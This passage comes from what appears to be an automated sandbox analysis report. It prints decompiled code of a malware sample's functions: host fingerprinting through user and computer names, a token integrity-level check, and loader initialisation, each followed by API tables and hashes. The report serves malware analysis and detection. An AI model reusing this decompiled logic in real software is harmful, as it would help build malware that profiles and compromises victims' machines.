				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x435d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04357CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x435d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x043593d5
                                          0x043593dd
                                          0x043593e1
                                          0x043593e4
                                          0x043593e9
                                          0x043593eb
                                          0x043593f0
                                          0x043593f0
                                          0x043593f6
                                          0x043593f8
                                          0x04359405
                                          0x04359466
                                          0x04359407
                                          0x0435940c
                                          0x04359412
                                          0x04359417
                                          0x04359425
                                          0x04359429
                                          0x04359438
                                          0x0435943f
                                          0x04359446
                                          0x04359446
                                          0x04359451
                                          0x04359451
                                          0x04359429
                                          0x04359417
                                          0x04359468
                                          0x0435946e
                                          0x04359478
                                          0x0435947a
                                          0x0435947f
                                          0x0435948e
                                          0x04359492
                                          0x0435949d
                                          0x043594a4
                                          0x043594ab
                                          0x043594ab
                                          0x043594b7
                                          0x043594b7
                                          0x04359492
                                          0x043594c2
                                          0x043594c4
                                          0x043594c7
                                          0x043594c9
                                          0x043594cc
                                          0x043594cf
                                          0x043594d9
                                          0x043594dd
                                          0x043594e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0435940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04359423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04359430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04359451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04359478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0435948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04359499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 043594B7
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 728f5ef3c48f3953c9b346fc1e74ff61458e5d144e9521aef42b41bacb87763c
                                          • Instruction ID: b0166584df58a65198f31a139af393eccd36528cd75496a9e11fc968b5e500fd
                                          • Opcode Fuzzy Hash: 728f5ef3c48f3953c9b346fc1e74ff61458e5d144e9521aef42b41bacb87763c
                                          • Instruction Fuzzy Hash: BB31D8B1A00205EFEB10DFA9D981B6EB7FDEF48304F61A469E905D7220D738EE419B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043553E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E043553E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x435d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E043558BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0435147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x043553f0
                                          0x043553f7
                                          0x043553fe
                                          0x04355412
                                          0x0435541d
                                          0x04355435
                                          0x04355442
                                          0x04355445
                                          0x0435544a
                                          0x04355455
                                          0x04355459
                                          0x04355468
                                          0x0435546c
                                          0x04355488
                                          0x04355488
                                          0x0435548c
                                          0x0435548c
                                          0x04355491
                                          0x04355495
                                          0x0435549b
                                          0x0435549c
                                          0x043554a3
                                          0x043554a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04355415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04355435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04355445
                                          • CloseHandle.KERNEL32(00000000), ref: 04355495
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04355468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04355470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04355480
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: d5484682e1dc7fb7d8afc75834f394cb5ca7e0f1f03a440d3b60757bb374c66a
                                          • Instruction ID: 61be69ee96ae21b562ddd9318ad55c864e9d8f7f37e6af1ff7b3437bedd923e9
                                          • Opcode Fuzzy Hash: d5484682e1dc7fb7d8afc75834f394cb5ca7e0f1f03a440d3b60757bb374c66a
                                          • Instruction Fuzzy Hash: C12139B5900218FFEB009FA4DC44EAEBBBDEB48314F1090A5E910A7261C775AE45EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435A060, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 435a060-435a0a6 SysAllocString 187 435a0ac-435a0d9 186->187 188 435a1ca-435a1ce 186->188 194 435a0df-435a0eb call 435a872 187->194 195 435a1c8 187->195 189 435a1d0-435a1d3 SafeArrayDestroy 188->189 190 435a1d9-435a1dd 188->190 189->190 192 435a1df-435a1e2 SysFreeString 190->192 193 435a1e8-435a1ee 190->193 192->193 194->195 198 435a0f1-435a101 194->198 195->188 198->195 200 435a107-435a12d IUnknown_QueryInterface_Proxy 198->200 200->195 202 435a133-435a147 200->202 204 435a186-435a18b 202->204 205 435a149-435a14d 202->205 206 435a18d-435a192 204->206 207 435a1bf-435a1c4 204->207 205->204 208 435a14f-435a166 StrStrIW 205->208 206->207 209 435a194-435a19f call 4351295 206->209 207->195 210 435a17d-435a180 SysFreeString 208->210 211 435a168-435a171 call 43591b5 208->211 215 435a1a4-435a1a8 209->215 210->204 211->210 216 435a173-435a17b call 435a872 211->216 215->207 217 435a1aa-435a1af 215->217 216->210 219 435a1b1-435a1b8 217->219 220 435a1ba 217->220 219->207 220->207
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 0435A09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0435A11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 0435A15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 0435A180
                                            • Part of subcall function 043591B5: SysAllocString.OLEAUT32(0435C298), ref: 04359205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 0435A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 0435A1E2
                                            • Part of subcall function 0435A872: Sleep.KERNEL32(000001F4), ref: 0435A8BA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 9012a92d246f5f8ceeb136a4b8ccfb22dc1d3ab820c35c3db7298337d46b6626
                                          • Instruction ID: 5c6288b18769bf4f082378c3db31b393688a623e38eeb923f39d54a4fe3925db
                                          • Opcode Fuzzy Hash: 9012a92d246f5f8ceeb136a4b8ccfb22dc1d3ab820c35c3db7298337d46b6626
                                          • Instruction Fuzzy Hash: 5D518535500609EFDB01EFA8D844EAEB7BAFF88740F149529E915DB220EB35EE05DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04357C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 222 4357c75-4357c88 223 4357c8f-4357c93 StrChrA 222->223 224 4357c95-4357ca6 call 43558be 223->224 225 4357c8a-4357c8e 223->225 228 4357ca8-4357cb4 StrTrimA 224->228 229 4357ceb 224->229 225->223 230 4357cb6-4357cbf StrChrA 228->230 231 4357ced-4357cf4 229->231 232 4357cd1-4357cdd 230->232 233 4357cc1-4357ccb StrTrimA 230->233 232->230 234 4357cdf-4357ce9 232->234 233->232 234->231
                                          C-Code - Quality: 54%
                                          			E04357C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E043558BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x435c28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x435c28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x04357c80
                                          0x04357c84
                                          0x04357c86
                                          0x04357c87
                                          0x04357c8f
                                          0x04357c8f
                                          0x04357c93
                                          0x00000000
                                          0x00000000
                                          0x04357c8a
                                          0x04357c8b
                                          0x04357c8e
                                          0x04357c8e
                                          0x04357c9b
                                          0x04357ca0
                                          0x04357ca6
                                          0x04357cae
                                          0x04357cb4
                                          0x04357cb6
                                          0x04357cbb
                                          0x04357cbf
                                          0x04357cc1
                                          0x04357cc4
                                          0x04357ccb
                                          0x04357ccb
                                          0x04357cd1
                                          0x04357cd5
                                          0x04357cd8
                                          0x04357cd9
                                          0x04357cdb
                                          0x04357ce3
                                          0x04357ce7
                                          0x04357ce7
                                          0x04357cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,068795AC,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?), ref: 04357C8F
                                          • StrTrimA.KERNELBASE(?,0435C28C,00000002,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?,4D283A53), ref: 04357CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?,4D283A53,?), ref: 04357CB9
                                          • StrTrimA.SHLWAPI(00000001,0435C28C,?,?,?,04354C85,068795AC,?,?,?,04354A8B,?,?,?,4D283A53,?), ref: 04357CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: c00bd33c81677d49996970574b82a4e86741158623360d121693d961a34bd57d
                                          • Instruction ID: 2c80a7857754a8dc937a5dc016c3bfd9f9d2ed8f60af9030891ff5970bab6a84
                                          • Opcode Fuzzy Hash: c00bd33c81677d49996970574b82a4e86741158623360d121693d961a34bd57d
                                          • Instruction Fuzzy Hash: 6D01B5716053216BD2219E659C48E3BBFACFB45A60F116519FC51C7350DB60E80186F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043590A1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38sleepmemorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 43590a1-43590b7 HeapCreate 236 43590be-43590d4 GetTickCount call 4356a7f 235->236 237 43590b9-43590bc 235->237 238 435911c 236->238 241 43590d6-43590d7 236->241 237->238 242 43590d8-4359100 SwitchToThread call 4351c04 Sleep 241->242 245 4359102-435910b call 4359511 242->245 248 4359117 call 4354908 245->248 249 435910d 245->249 248->238 249->248
                                          C-Code - Quality: 100%
                                          			E043590A1(void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x435d238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x435d1a8 = GetTickCount();
				_t7 = E04356A7F(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E04351C04(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E04359511(_t15) != 0) {
						 *0x435d260 = 1; // executed
					}
					_t13 = E04354908(_t16); // executed
					return _t13;
				}
				return _t7;
			}











                                          0x043590a1
                                          0x043590aa
                                          0x043590b0
                                          0x043590b7
                                          0x043590bb
                                          0x00000000
                                          0x043590bb
                                          0x043590c8
                                          0x043590cd
                                          0x043590d4
                                          0x043590d8
                                          0x043590e4
                                          0x043590e8
                                          0x043590f7
                                          0x043590fd
                                          0x0435910b
                                          0x0435910d
                                          0x0435910d
                                          0x04359117
                                          0x00000000
                                          0x04359117
                                          0x0435911c

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04356F11,?), ref: 043590AA
                                          • GetTickCount.KERNEL32 ref: 043590BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 043590D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 043590F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID: *1a
                                          • API String ID: 377297877-913525848
                                          • Opcode ID: 0c7344ddcbdf01d9173b59c872a0225c3f3f7423fcb99f834f6ad3d38eccc047
                                          • Instruction ID: 407a34c0e46734a78b44994804cd6113087dd0654693d743cdf92ea088560e5b
                                          • Opcode Fuzzy Hash: 0c7344ddcbdf01d9173b59c872a0225c3f3f7423fcb99f834f6ad3d38eccc047
                                          • Instruction Fuzzy Hash: 69F068B1600310EAE7107B74EC49F6E36ACEF48759F007421EC05D7150EB38E941D661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04354908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 251 4354908-4354922 call 43511af 254 4354924-4354932 251->254 255 4354938-4354946 251->255 254->255 257 4354958-4354973 call 4351111 255->257 258 4354948-435494b 255->258 264 4354975-435497b 257->264 265 435497d 257->265 258->257 259 435494d-4354952 258->259 259->257 261 4354adb 259->261 263 4354add-4354ae2 261->263 266 4354983-4354998 call 4351ec4 call 4351a4e 264->266 265->266 271 43549a3-43549a9 266->271 272 435499a-435499d CloseHandle 266->272 273 43549cf-43549e7 call 43558be 271->273 274 43549ab-43549b0 271->274 272->271 283 4354a13-4354a15 273->283 284 43549e9-4354a11 memset RtlInitializeCriticalSection 273->284 275 4354ac6-4354acb 274->275 276 43549b6 274->276 278 4354ad3-4354ad9 275->278 279 4354acd-4354ad1 275->279 280 43549b9-43549c8 call 4357827 276->280 278->263 279->263 279->278 289 43549ca 280->289 287 4354a16-4354a1a 283->287 284->287 287->275 288 4354a20-4354a36 RtlAllocateHeap 287->288 290 4354a66-4354a68 288->290 291 4354a38-4354a64 wsprintfA 288->291 289->275 292 4354a69-4354a6d 290->292 291->292 292->275 293 4354a6f-4354a8f call 43593d5 call 43598f7 292->293 293->275 298 4354a91-4354a98 call 435205b 293->298 301 4354a9f-4354aa6 298->301 302 4354a9a-4354a9d 298->302 303 4354aa8-4354aaa 301->303 304 4354abb-4354abf call 4359b6f 301->304 302->275 303->275 306 4354aac-4354ab0 call 4356cd3 303->306 308 4354ac4 304->308 309 4354ab5-4354ab9 306->309 308->275 309->275 309->304
                                          C-Code - Quality: 57%
                                          			E04354908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E043511AF();
				if(_t21 != 0) {
					_t59 =  *0x435d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x435d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x435d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04351111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x435d2a4; // 0x251a5a8
					if( *0x435d25c > 5) {
						_t8 = _t26 + 0x435e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x435ea05; // 0x44283a44
						_t27 = _t7;
					}
					E04351EC4(_t27, _t27);
					_t31 = E04351A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x435d270 =  *0x435d270 ^ 0x81bbe65d;
						_t32 = E043558BE(0x60);
						 *0x435d324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x435d324; // 0x68795b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x435d324; // 0x68795b0
							 *_t51 = 0x435e845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x435d238, 0, 0x43);
							 *0x435d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x435d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x435d2a4; // 0x251a5a8
								_t13 = _t58 + 0x435e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x435c28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E043593D5( ~_v8 &  *0x435d270, 0x435d00c); // executed
								_t42 = E043598F7(0, _t55, _t63, 0x435d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E0435205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04359B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E04356CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x435d160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04357827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x04354908
                                          0x04354912
                                          0x04354915
                                          0x04354918
                                          0x0435491b
                                          0x04354922
                                          0x04354924
                                          0x04354930
                                          0x04354932
                                          0x04354932
                                          0x0435493b
                                          0x04354941
                                          0x04354946
                                          0x04354960
                                          0x0435496c
                                          0x0435496e
                                          0x04354973
                                          0x0435497d
                                          0x0435497d
                                          0x04354975
                                          0x04354975
                                          0x04354975
                                          0x04354975
                                          0x04354984
                                          0x04354991
                                          0x04354998
                                          0x0435499d
                                          0x0435499d
                                          0x043549a6
                                          0x043549a9
                                          0x043549cf
                                          0x043549db
                                          0x043549e0
                                          0x043549e5
                                          0x043549e7
                                          0x04354a13
                                          0x04354a15
                                          0x043549e9
                                          0x043549ed
                                          0x043549f2
                                          0x043549f7
                                          0x043549fe
                                          0x04354a04
                                          0x04354a09
                                          0x04354a0f
                                          0x04354a16
                                          0x04354a18
                                          0x04354a1a
                                          0x04354a29
                                          0x04354a2f
                                          0x04354a34
                                          0x04354a36
                                          0x04354a66
                                          0x04354a68
                                          0x04354a38
                                          0x04354a38
                                          0x04354a3e
                                          0x04354a4b
                                          0x04354a51
                                          0x04354a51
                                          0x04354a59
                                          0x04354a62
                                          0x04354a69
                                          0x04354a6b
                                          0x04354a6d
                                          0x04354a74
                                          0x04354a81
                                          0x04354a86
                                          0x04354a8b
                                          0x04354a8d
                                          0x04354a8f
                                          0x00000000
                                          0x00000000
                                          0x04354a91
                                          0x04354a96
                                          0x04354a98
                                          0x04354a9f
                                          0x04354aa3
                                          0x04354aa6
                                          0x04354abb
                                          0x04354abf
                                          0x04354ac4
                                          0x00000000
                                          0x04354ac4
                                          0x04354aa8
                                          0x04354aaa
                                          0x00000000
                                          0x00000000
                                          0x04354ab0
                                          0x04354ab5
                                          0x04354ab7
                                          0x04354ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04354ab9
                                          0x04354a9c
                                          0x04354a9c
                                          0x04354a6d
                                          0x043549ab
                                          0x043549ab
                                          0x043549b0
                                          0x04354ac6
                                          0x04354acb
                                          0x04354ad3
                                          0x04354ad3
                                          0x00000000
                                          0x04354acb
                                          0x043549b6
                                          0x043549b9
                                          0x043549c3
                                          0x043549ca
                                          0x00000000
                                          0x04354adb
                                          0x04354adb
                                          0x04354ade
                                          0x04354ae2
                                          0x04354ae2

                                          APIs
                                            • Part of subcall function 043511AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04354920,00000001), ref: 043511BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 0435499D
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • memset.NTDLL ref: 043549ED
                                          • RtlInitializeCriticalSection.NTDLL(06879570), ref: 043549FE
                                            • Part of subcall function 04356CD3: memset.NTDLL ref: 04356CED
                                            • Part of subcall function 04356CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04356D24
                                            • Part of subcall function 04356CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04354AB5), ref: 04356D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04354A29
                                          • wsprintfA.USER32 ref: 04354A59
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 5f2c5d7fe93f9831d2b32287e40649d932e55521c18aa99ee7dbda1fead1e5fd
                                          • Instruction ID: 3f8b14ec382748beb13239727c578591994b61720538faac6b748f10260cad95
                                          • Opcode Fuzzy Hash: 5f2c5d7fe93f9831d2b32287e40649d932e55521c18aa99ee7dbda1fead1e5fd
                                          • Instruction Fuzzy Hash: 8F51D471A00315AFEB65EBA4D845F6E73ACEF18724F04B415ED01D71A0E778FA808B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04356CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04356CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x435d2a4; // 0x251a5a8
				_t5 = _t40 + 0x435ee24; // 0x410025
				_t90 = E04354814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E0435147E(_v88);
					goto L24;
				}
				if(E04359138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E0435A5E9(0,  *0x435d33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x435d2a4; // 0x251a5a8
					_t11 = _t52 + 0x435e81a; // 0x65696c43
					_t55 = E0435A5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
